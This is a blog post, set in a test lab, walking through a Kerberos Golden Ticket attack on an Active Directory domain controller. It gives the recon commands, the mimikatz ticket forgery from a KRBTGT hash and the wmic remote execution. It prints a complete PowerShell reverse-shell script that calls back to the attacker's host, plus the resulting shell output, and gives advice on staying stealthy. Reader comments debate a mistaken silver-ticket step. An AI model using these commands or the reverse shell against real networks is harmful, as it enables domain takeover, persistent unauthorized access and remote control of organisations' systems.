This is the second part of my previous post. Remember, you have the domain controller’s dump of the hashes, but it’s the test lab and when you try to login via PTH (pass the hash), no way.. probably domain admin password was changed…
Game over?
Not at all.. we can try the “Golden Ticket” solution…
What is the Golden Ticket?
Before going ahead , a short recap on Microsoft Kerberos architecture:
In order to access resources on a Windows AD network using the Kerberos protocol, first of all you have to get a TGT ticket that you will use to request tickets for the requested services (TGS). Tickets are delivered by the KDC server service which runs on the domain controllers.
Got it? And here comes the “Golden Ticket” attack, which permits you to create forged Kerberos Ticket Granting Tickets (TGT) offline to get unauthorized access , impersonating any domain user and that is good for 10 years or as long as you choose!
What should we need to create this Golden ticket?
- the domain name
- the AD domain security identifier (SID)
- a valid username (Administrator, of course!)
- the hash of the KRBTGT account
Domain name and domain is not an issue, for example you could use “enum4linux” tool on a Linux box (all you need is the ip address of DC):
#enum4linux 10.1.3.40 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb 14 22:10:13 2017 ========================== | Target Information | ========================== Target ........... 10.1.3.40 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ======================================================= | Enumerating Workgroup/Domain on 10.1.3.40 | ======================================================= [+] Got domain/workgroup name: DUMMYCOMPANY =============================================== | Nbtstat Information for 10.1.3.40 | =============================================== Looking up status of 10.1.3.40 SERVER2012DC - B Workstation Service DUMMYCOMPANY - B Domain/Workgroup Name DUMMYCOMPANY - B Domain Controllers SERVER2012DC - B File Server Service DUMMYCOMPANY - B Domain Master Browser MAC Address = 08-00-27-DC-6C-54 ... ... ============================================== | Getting domain SID for 10.1.3.40 | ============================================== Domain Name: DUMMYCOMPANY Domain Sid: S-1-5-21-3534665177-2148510708-2241433719 [+] Host is part of a domain (not a workgroup) ========================================= | OS information on 10.1.3.40 | ========================================= [+] Got OS info for 10.1.3.40 from smbclient: Domain=[DUMMYCOMPANY] OS=[Windows Server 2012 R2 Datacenter 9600] Server=[Windows Server 2012 R2 Datacenter 6.3]
You will get many “Acces Denied” because you are connecting as anonymous user, but all the necessary stuff will be delivered to you 😉
In order to to get the FQDN of the domain, just try a simple reverse nslookup pointing to the DNS server hosted on DC:
# nslookup > server 10.1.3.40 Default server: 10.1.3.40 Address: 10.1.3.40#53 > set q=ptr > 10.1.3.40 Server: 10.1.3.40 Address: 10.1.3.40#53 40.3.2.10.in-addr.arpa name = server2012dc.dummycompany.local
Got it? Great! and now the last one, KRBTGT hash, but first of all, what is this account?
“The KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. This account cannot be deleted, and the account name cannot be changed. The KRBTGT account cannot be enabled in Active Directory.”
And yes, we have the hashes of the password of the KRBTGT account, remember?
The only problem we could face is that meantime the password of the “krbtgt” was changed, but due to the severe impact of this operation on the entire domain, probably this will not be the case. Admins will change this password only if security issues occurs (such as a “Golden Ticket” evidence 😉 )
In brief, we have the following info:
- Domain name: DUMMYCOMPANY
- User name: Administrator
- SID: S-1-5-21-3534665177-2148510708-2241433719
- KRBTGT hash: 3003567af268a4a94e26f410e84353f1
Creating “Golden Tickets”
Time has come to put into practise all we discussed above. First of all, fireup your Windows box with “mimikatz“installed!
On your Windows (virtual of physical) machine, logon with local admin rights, open an elevated command prompt and launch “mimikatz.exe”
mimikatz # kerberos::golden /admin:Administrator /domain:DUMMYDOMAIN.LOCAL /sid:S -1-5-21-3534665177-2148510708-2241433719 /krbtgt:3003567af268a4a94e26f410e84353 f1 /ticket:admin.krb /ptt User : Administrator Domain : DUMMYDOMAIN.LOCAL (DUMMYDOMAIN) SID : S-1-5-21-3534665177-2148510708-2241433719 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 3003567af268a4a94e26f410e84353f1 - rc4_hmac_nt Lifetime : 2/14/2017 11:08:35 PM ; 2/12/2027 11:08:35 PM ; 2/12/2027 11:08:35 P M -> Ticket : admin.krb * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file !
So we told mimikatz to generate a “golden ticket” for User Administrator on DUMMYDOMAIN.LOCAL with all the necessary parameters and generate it to a file for later use. The last option /ptt tells mimikatz to load directly the newly created ticket in memroy, ready for “Pass The Ticket” operations.
Now, we can exit mimikatz and from our command shell list the tickets:
C:\Users\Administrator\>klist Current LogonId is 0:0x219fd Cached Tickets: (1) #0> Client: Administrator @ DUMMYDOMAIN.LOCAL Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent Start Time: 2/15/2017 7:14:56 (local) End Time: 2/13/2027 7:14:56 (local) Renew Time: 2/13/2027 7:14:56 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called:
Great! Finally we have our “Golden Ticket”, and look at the lifetime, 10 years!!
Does it work? Again finger crossed, let’s try to list contents of C: drive of domain controller. But first of all, map the server’s name in hosts file or point directly DNS server to the Domain Controller, it’s up to you! If you try to map the resource via IP address, NTLM authentication will take in place and all you will get is an “ACCESS DENIED”.
C:\Users\Administrator>dir \\server2012dc.dummydomain.local\c$ Volume in drive \\server2012dc.dummydomain.local\c$ has no label. Volume Serial Number is A2D7-CEAD Directory of \\server2012dc.dummydomain.local\c$ 08/22/2013 07:52 AM PerfLogs 08/22/2013 06:50 AM Program Files 01/13/2017 10:35 PM PProgram Files (x86) 01/27/2017 03:57 AM temp 01/27/2017 02:43 AM test 01/27/2017 01:37 AM Users ...
Awesome! We list the contents of C: drive belonging to the domain controller “server2012dc”, we have Domain Admin privileges!!
Now let’s go further, having access to the filesystem (local or shared) with Admin privilege is a great result, but we want more .. what about a shell to interact with domain controller? This would be the big deal.. is it possible? Yes of course!
But ist’s not that easy: How can we get a get a remote shell authenticating with kerberos ticket?
What should we need to accomplish this?
And here comes to play the fantastic MS build-in tool “wmic.exe”.
This tool is a command line front-end to the WMI (Windows Management Instrumentation) and guess what? It is possible to spawn processes on remote computers authenticating via kerberos!
We will copy this reverse-shell script on the domain controller (assuming your ip is 10.1.2.40):
>c:\users\administrator\>type rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.1.2.40',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
c:\users\administrator\>copy rev.ps1 \\server2012dc.dummycompany.local\c$\windows\temp
After that, we can call the powershell script from wmic (remember to launch “nc -lp 8080” on your Linux box!) :
wmic /authority:"kerberos:DUMMYDOMAIN\SERVER2012DC" /node:server2012dc process call create "powershell -f c:\windows\temp\rev.ps1"
Finger crossed again 2 …. and take a look in our terminal:
connect to [10.1.2.40] from server2012dc.dummydomain.local [10.1.3.40] 62471 PS C:\Windows\system32> PS C:\Windows\system32> PS C:\Windows\system32> whoami dummycompany\administrator
We dit it, great job!
That’all. 🙂
Decoder's Blog 
Just forgot to clarify these points:
1) If you don’t create the service tickets (rpcss, host, cifs), windows will ask them for you. But we have to be as stealth as possible 😉
2) You can also use psexec to get a remote shell (works with kerberos auth) but again, this will create the PSEXECV service on remote machine for all the duration of the shell. But again, we want to be stealth 😉
LikeLiked by 2 people
Reblogged this on KNX Security – Practical Penetration Test.
LikeLike
How come you are using 3003567af268a4a94e26f410e84353f1 for the 2 silver tickets generation ?
And this number is just krbtgt with f1 appended ? mimikats outputs it in the golden ticket generation as ServiceKey ?
I undestand for silver tickets you need the service/computer account of the destination server.
So in this case for TGS you will need server2012dc computer account hash ?
Otherwise in this case both will be treated as invalid, and 2 TGS will be requested using the TGT, and KDC will be contacted (so it will not be completely stealthy).
LikeLike
Probably you made some confusion.. Golden tickets have nothing to do with silver.. In this case(golden ticket) once you have one of the krbtgt account hashes you can generate a ticket with admin privs
LikeLike
I don’t agree. You can’t generate TGS ( /service:rpcss and /service:host ) with krbtgt hash. You need to use target service/computer account.
I mean, you can, but both will be invalid.
It will still work anyway because you have a valid TGT (the golden one) and with that KDC will be contacted and 2 valid TGS will be generated (but not the 2 created offline)
LikeLike
Ok got it, thx. Thought you was talking about the first part. Yes indeed I made the wrong copy paste from my commands. Should be /rc4:. Removed this part in order to avoid confusion ;-).
LikeLike